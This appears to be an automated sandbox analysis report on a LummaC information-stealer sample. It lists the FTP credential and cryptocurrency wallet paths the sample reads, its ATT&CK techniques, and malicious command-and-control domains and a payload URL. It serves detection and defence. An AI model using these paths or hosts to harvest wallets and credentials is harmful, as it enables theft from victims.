                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: Yara matchFile source: 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1559608097.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                111
                Process Injection
                12
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services41
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                111
                Process Injection
                LSASS Memory131
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1600405 Sample: h226x41CQ6 Startdate: 27/01/2025 Architecture: WINDOWS Score: 100 19 itsrevolutionmagnus.xyz 2->19 21 platformcati.sbs 2->21 25 Suricata IDS alerts for network traffic 2->25 27 Found malware configuration 2->27 29 Antivirus detection for URL or domain 2->29 33 6 other signatures 2->33 7 h226x41CQ6.exe 2->7         started        signatures3 31 Performs DNS queries to domains with low reputation 19->31 process4 signatures5 35 Injects a PE file into a foreign processes 7->35 37 LummaC encrypted strings found 7->37 10 h226x41CQ6.exe 7->10         started        14 WerFault.exe 21 16 7->14         started        process6 dnsIp7 23 platformcati.sbs 104.21.112.1, 443, 49702, 49703 CLOUDFLARENETUS United States 10->23 39 Query firmware table information (likely to detect VMs) 10->39 41 Found many strings related to Crypto-Wallets (likely being stolen) 10->41 43 Tries to harvest and steal ftp login credentials 10->43 45 2 other signatures 10->45 17 C:\ProgramData\Microsoft\...\Report.wer, Unicode 14->17 dropped file8 signatures9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                h226x41CQ6.exe79%VirustotalBrowse
                h226x41CQ6.exe87%ReversingLabsWin32.Trojan.Multiverze
                h226x41CQ6.exe100%AviraHEUR/AGEN.1305290
                h226x41CQ6.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                qualifielgalt.sbs100%Avira URL Cloudmalware
                https://platformcati.sbs/apieI100%Avira URL Cloudmalware
                https://platformcati.sbs/S100%Avira URL Cloudmalware
                pioneeruyj.sbs100%Avira URL Cloudmalware
                https://platformcati.sbs/api?100%Avira URL Cloudmalware
                fightyglobo.sbs100%Avira URL Cloudmalware
                https://platformcati.sbs/apip100%Avira URL Cloudmalware
                conceptionnyi.sbs100%Avira URL Cloudmalware
                nervepianoyo.sbs100%Avira URL Cloudmalware
                https://itsrevolutionmagnus.xyz/100%Avira URL Cloudmalware
                https://platformcati.sbs/api(w100%Avira URL Cloudmalware
                https://itsrevolutionmagnus.xyz/a100%Avira URL Cloudmalware
                smashygally.sbs100%Avira URL Cloudmalware
                https://itsrevolutionmagnus.xyz/Pa/100%Avira URL Cloudmalware
                https://itsrevolutionmagnus.xyz/Shnnfd.exe%100%Avira URL Cloudmalware
                modellydivi.sbs100%Avira URL Cloudmalware
                platformcati.sbs100%Avira URL Cloudmalware
                https://itsrevolutionmagnus.xyz/Shnnfd.exe100%Avira URL Cloudmalware
                https://platformcati.sbs/#HX100%Avira URL Cloudmalware
                https://platformcati.sbs/apiz100%Avira URL Cloudmalware
                https://platformcati.sbs/api100%Avira URL Cloudmalware
                https://platformcati.sbs/api~100%Avira URL Cloudmalware
                https://platformcati.sbs/100%Avira URL Cloudmalware
                https://platformcati.sbs/h100%Avira URL Cloudmalware

                Download Network PCAP: filteredfull

                NameIPActiveMaliciousAntivirus DetectionReputation
                platformcati.sbs
                104.21.112.1
                truetrue
                  unknown
                  itsrevolutionmagnus.xyz
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    qualifielgalt.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    pioneeruyj.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    fightyglobo.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    conceptionnyi.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    nervepianoyo.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    modellydivi.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    smashygally.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    platformcati.sbstrue
                    • Avira URL Cloud: malware
                    unknown
                    https://platformcati.sbs/apitrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.cloudflare.com/learning/access-management/phishing-attack/h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1279584582.0000000001266000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtabh226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://platformcati.sbs/apieIh226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://ocsp.entrust.net03h226x41CQ6.exefalse
                            high
                            http://ocsp.entrust.net02h226x41CQ6.exefalse
                              high
                              https://platformcati.sbs/apiph226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://platformcati.sbs/Sh226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://x1.c.lencr.org/0h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://x1.i.lencr.org/0h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchh226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.entrust.net/ts1ca.crl0h226x41CQ6.exefalse
                                        high
                                        https://itsrevolutionmagnus.xyz/h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://platformcati.sbs/api?h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://support.mozilla.org/products/firefoxgro.allh226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://platformcati.sbs/api(wh226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://itsrevolutionmagnus.xyz/Shnnfd.exe%h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://platformcati.sbs/#HXh226x41CQ6.exe, 00000004.00000002.1632344310.000000000122D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://itsrevolutionmagnus.xyz/ah226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoh226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.entrust.net/rpa03h226x41CQ6.exefalse
                                              high
                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdveh226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://aia.entrust.net/ts1-chain256.cer01h226x41CQ6.exefalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://upx.sf.netAmcache.hve.10.drfalse
                                                          high
                                                          https://www.amazon.com/?tag=admarketus-20&rh226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ocsp.rootca1.amazontrust.com0:h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://itsrevolutionmagnus.xyz/Pa/h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brh226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.cloudflare.com/5xx-error-landingh226x41CQ6.exe, 00000004.00000003.1276217252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgh226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uh226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eh226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://itsrevolutionmagnus.xyz/Shnnfd.exeh226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://platformcati.sbs/apizh226x41CQ6.exe, 00000004.00000003.1276150562.0000000001247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://platformcati.sbs/hh226x41CQ6.exe, 00000004.00000003.1293612240.00000000012BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://platformcati.sbs/h226x41CQ6.exe, 00000004.00000003.1528684635.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528737340.0000000003B5C000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://platformcati.sbs/api~h226x41CQ6.exe, 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.entrust.net/2048ca.crl0h226x41CQ6.exefalse
                                                                                  high
                                                                                  https://www.entrust.net/rpa0h226x41CQ6.exefalse
                                                                                    high
                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctah226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.112.1
                                                                                      platformcati.sbsUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1600405
                                                                                      Start date and time:2025-01-27 14:53:17 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 4m 39s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:18
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:h226x41CQ6.exe
                                                                                      (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                      Original Sample Name:fc8506934f3f379af5f36cdccb0c17ca
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@4/5@2/1
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.32.72, 13.107.253.45, 4.175.87.197
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      TimeTypeDescription
                                                                                      08:54:13API Interceptor8x Sleep call for process: h226x41CQ6.exe modified
                                                                                      10:01:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.112.1AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.buyspeechst.shop/ub3i/
                                                                                      z27Transferenci.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.cheapwil.shop/ekxu/
                                                                                      rR39202_08.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.enoughmoney.online/nf1d/
                                                                                      Bernadette Karam CV.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.buyspeechst.shop/x8ql/
                                                                                      XqCBweyLoN0t8Vy.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.arryongro-nambe.live/t44l/
                                                                                      RFQ862_791.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • www.dejikenkyu.cyou/pmpa/
                                                                                      http://case-id-100084633.argentpropertiesvb.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • case-id-100084633.argentpropertiesvb.com/
                                                                                      Fedex 22122024 overdue invoicesxlx..exeGet hashmaliciousFormBookBrowse
                                                                                      • www.enoughmoney.online/271w/
                                                                                      Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.cikolatasampuan.xyz/s3vh/
                                                                                      http://informed.deliverywfv.top/usGet hashmaliciousUnknownBrowse
                                                                                      • informed.deliverywfv.top/us
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      platformcati.sbsoGjfUw6bZu.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.53.40
                                                                                      K3SRs78CAv.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      W1WowSI1iG.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      wXtaX552wr.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.3
                                                                                      PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.3
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUShttp://wtsevent.comGet hashmaliciousTechSupportScamBrowse
                                                                                      • 104.17.25.14
                                                                                      https://ipfs.io/ipfs/bafybeid6tjglb257r22luzrxejc72ougo4co3wky3g5aiy3b4nmq2kmedi?login=milano@iesweb.netGet hashmaliciousUnknownBrowse
                                                                                      • 104.18.186.31
                                                                                      rMM-PO-2025012786.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.32.1
                                                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      • 172.67.180.49
                                                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      • 172.67.180.49
                                                                                      Attn_257133_12222022.imgGet hashmaliciousQbotBrowse
                                                                                      • 104.18.37.111
                                                                                      Wire_Transfer_000789tt.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      rIMG_1056_6772.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.26.12.205
                                                                                      https://giftexchangegenerator.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                      • 104.21.26.223
                                                                                      NRKCZ1PSDM.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                      • 172.64.41.3
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1QuxHx2gOLI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 104.21.112.1
                                                                                      New v2.2.0.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      Installer.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      A_acid11.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      Loader.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      4JPKDcwtDo.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      p199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                      • 104.21.112.1
                                                                                      VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                                      • 104.21.112.1
                                                                                      grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
